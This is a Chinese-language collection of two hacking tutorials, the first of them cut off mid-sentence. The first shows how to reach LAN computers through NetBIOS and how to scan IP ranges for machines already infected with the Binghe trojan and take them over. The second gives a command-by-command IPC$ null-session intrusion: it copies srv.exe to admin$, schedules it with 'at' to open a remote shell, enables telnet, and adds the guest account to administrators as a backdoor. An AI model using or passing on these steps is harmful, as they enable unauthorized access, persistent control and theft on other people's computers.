① 怎樣入侵同在一個區域網的電腦
方法一: 1.取得對方IP地址如XX.XX.XX.XX,方法太多不細講了。 2.判斷對方上網的地點,開個DOS窗口鍵入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是對方的上網地點。 3.得到對方電腦的名稱,開個DOS窗口鍵入 NBTSTAT -A XX.XX.XX.XX 第一行是對方電腦名稱 第二行是對方電腦所在工作組 第三行是對方電腦的說明 4.在Windows目錄下有一文件名為LMHOSTS.SAM,將其改名為LMHOSTS,刪除其內容,將對方的IP及電腦名按以下格式寫入文件: XX.XX.XX.XX 電腦名 5.開DOS窗口鍵入 NBTSTAT -R 6.在開始-查找-電腦中輸入對方電腦名,出現對方電腦點擊即可進入。 方法二: 第一步 下載必備的工具軟體。1號軟體就是埠掃描工具「網路刺客II」,2號軟體就是著名的國產木馬冰河2.2的控制端。 下載完畢並解壓縮之後跟我進行第二步! 第二步 運行1號軟體,首先出現的是「網路刺客II注冊向導」,別理它,點擊「稍後(Q)」就進入了網路刺客II的主界面。 第三步 在網路刺客II的主界面里選「工具箱(U)」-》「主機查找器(H)」,就進入了「搜索網際網路主機」界面。 第四步 進入「搜索網際網路主機」界面後,「起始地址」欄填XXX.XXX.0.0其中XXX.XXX自己去選擇了,比如你可以選61.128或選61.200等等,「結束地址」欄填XXX.XXX.255.255其中XXX.XXX的選擇要和前面一樣。「埠」欄填7626,其他欄保持默認不動。 好了,以上設置就是要搜索從XXX.XXX.0.0到XXX.XXX.255.255這一段IP地址中有冰河木馬的計算機了,再檢查一下填對沒有?如果一切OK,請點擊「開始搜索」。 第五步 觀察「總進度」和「段進度」是否在走動。如果沒有走動,那一定是IP地址設置不對,請認真檢查。如果兩個進度都在走動,呵呵,你就成功一半了,至少你會使用網路刺客II掃描網上開放某一埠的計算機了。 下面你要作的就是靜靜的等待,學用黑客軟體是需要耐心的。大約20-30分鍾後,最下面的記錄欄里就應該出現記錄了(一般情況下,應該有5、6條記錄)。每一條記錄代表找到的中了冰河木馬的一台計算機,前面是該計算機的IP地址,後面是7626(冰河木馬埠)。 第六步 點擊「停止搜索」,但不要退出程序,到第十二步時還要用。運行2號軟體冰河,進入冰河主界面。選「文件[F]」-》「添加主機[A]」進入添加主機窗口。 第七步 在「添加主機」窗口,「顯示名稱」里填入第五步里搜索到的第一條IP地址,當IP地址填入「顯示名稱」里後,「主機地址」里就自動填入相同的IP了。「訪問口令」不填,「監聽埠」保持默認的7626。 好了,檢查一下IP有沒有填錯,如果OK,點擊「確定」,在冰河主界面的「文件管理器」里就出現了剛才填入的IP地址了。第八步 這一步和下一步最重要,請認真看清楚!在冰河的主界面里,點擊「文件管理器」里的「我的電腦」,這時「文件管理器」右邊的框里就會出現你自己的硬碟分區。比如,如果你的硬碟分的是四個區,「文件管理器」右邊的框里就會從上往下依次出現C:、D:、E:、F:,如果你的硬碟分的是兩個區,就會出現C:、D:。 第九步 點擊「文件管理器」里剛才輸入的第一條IP地址,稍等片刻(網速慢的情況下約10-30秒),在「文件管理器」右邊的框里就會出現對方計算機的硬碟分區了。看到了嗎?看到了?呵呵,祝賀你,你已經成功地進入對方的計算機了!!!!! 第十步 你發現沒有出現對方計算機的硬碟分區!!呵呵,別急,看看冰河主界面最下端的狀態欄里有什麼提示,如果是下面兩種情況,就放棄,返回第七步,填入搜索到的第二條IP地址: 1、狀態欄里出現「口令不對」、「口令錯誤」、「密碼不對」、「密碼錯誤」等之類的提示,表示該計算機的冰河木馬是加了密碼的,沒有辦法,只得放棄! 2、狀態欄里出現「正在解釋命令,
② 怎樣利用系統默認共享入侵
這是利用ipc$空連接和默認共享入侵。
空連接和ipc$(internet process connection)是不同的概念。空連接是在沒有信任的情況下與伺服器建立的會話,換句話說,它是一個到伺服器的匿名訪問。ipc$是為了讓進程間通信而開放的命名管道,可以通過驗證用戶名和密碼獲得相應的許可權。有許多的工具必須用到ipc$。默認共享是為了方便遠程管理而開放的共享,包含了所有的邏輯盤(c$,d$,e$......)和系統目錄winnt或windows(admin$)。
相關命令
建立空連接net use \\IP\ipc$Content$nbsp;"" /user:"" (一定要注意:這一行命令中包含了3個空格)
建立非空連接net use \\IP\ipc$Content$nbsp;"用戶名" /user:"密碼" (同樣有3個空格)
映射默認共享net use z: \\IP\c$Content$nbsp;"密碼" /user:"用戶名" (即可將對方的c盤映射為自己的z盤,其他盤類推)
如果已經和目標建立了ipc$,則可以直接用IP+盤符+$訪問,具體命令 net use z: \\IP\c$
刪除一個ipc$連接net use \\IP\ipc$Content$nbsp;/del
刪除共享映射net use c: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
經典入侵模式
1.C:\>net use \\127.0.0.1\IPC$Content$nbsp;"" /user:"admintitrators"
這是用《流光》掃到的用戶名是administrators,密碼為"空"的IP地址(空口令?哇,運氣好到家了),如果是打算攻擊的話,就可以用這樣的命令來與127.0.0.1建立一個連接,因為密碼為"空",所以第一個引號處就不用輸入,後面一個雙引號里的是用戶名,輸入administrators,命令即可成功完成。
2. C:\> srv.exe \\127.0.0.1\admin$Content$nbsp;
先復制srv.exe上去,在流光的Tools目錄下就有(這里的$是指admin用戶的c:\winnt\system32\,大家還可以使用c$、d$,意思是C盤與D盤,這看你要復制到什麼地方去了)。
3.C:\>net time \\127.0.0.1
查查時間,發現127.0.0.1 的當前時間是 2002/3/19 上午 11:00,命令成功完成。
4.C:\>at \\127.0.0.1 11:05 srv.exe
用at命令啟動srv.exe吧(這里設置的時間要比主機時間快,不然你怎麼啟動啊,呵呵!)
5.C:\>net time \\127.0.0.1
再查查到時間沒有?如果127.0.0.1 的當前時間是 2002/3/19 上午 11:05,那就准備開始下面的命令。
6.C:\>telnet 127.0.0.1 99
這里會用到Telnet命令吧,注意埠是99。Telnet默認的是23埠,但是我們使用的是SRV在對方計算機中為我們建立一個99埠的Shell。
雖然我們可以Telnet上去了,但是SRV是一次性的,下次登錄還要再激活!所以我們打算建立一個Telnet服務!這就要用到ntlm了
7.C:\> ntlm.exe \\127.0.0.1\admin$Content$nbsp;
用Copy命令把ntlm.exe上傳到主機上(ntlm.exe也是在《流光》的Tools目錄中)。
8.C:\WINNT\system32>ntlm
輸入ntlm啟動(這里的C:\WINNT\system32>指的是對方計算機,運行ntlm其實是讓這個程序在對方計算機上運行)。當出現"DONE"的時候,就說明已經啟動正常。然後使用"net start telnet"來開啟Telnet服務!
9.Telnet 127.0.0.1,接著輸入用戶名與密碼就進入對方了,操作就像在DOS上操作一樣簡單!(然後你想做什麼?想做什麼就做什麼吧,哈哈)
為了以防萬一,我們再把guest激活加到管理組
10.C:\>net user guest /active:yes
將對方的Guest用戶激活
11.C:\>net user guest 1234
將Guest的密碼改為1234,或者你要設定的密碼
12.C:\>net localgroup administrators guest /add
將Guest變為Administrator^_^(如果管理員密碼更改,guest帳號沒改變的話,下次我們可以用guest再次訪問這台計算機)
ipc$與空連接,139,445埠,默認共享的關系
以上四者的關系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)
ipc$與空連接
不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進行ipc$連接),自然就不能叫做空連接了.
許多人可能要問了,既然可以空連接,那我以後就空連接好了,為什麼還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當你以空連接登陸時,你沒有任何許可權(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應的許可權(有許可權誰不想呀,所以還是老老實實掃吧,不要偷懶喲).
ipc$與139,445埠
ipc$連接可以實現遠程登陸及對默認共享的訪問;而139埠的開啟表示netbios協議的應用,我們可以通過139,445(win2000)埠實現對共享文件/列印機的訪問,因此一般來講,ipc$連接是需要139或445埠來支持的.
ipc$與默認共享
默認共享是為了方便管理員遠程管理而默認開啟的共享(你當然可以關閉它),即所有的邏輯盤(c$,d$,e$……)和系統目錄winnt或windows(admin$),我們通過ipc$連接可以實現對這些默認共享的訪問(前提是對方沒有關閉這些默認共享)
ipc$連接失敗的原因
以下5個原因是比較常見的:
1)你的系統不是NT或以上操作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445埠(惑被防火牆屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
另外,你也可以根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員許可權的,先提升許可權;
錯誤號51,Windows 無法找到網路路徑 : 網路有問題;
錯誤號53,找不到網路路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(埠過濾);
錯誤號67,找不到網路名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連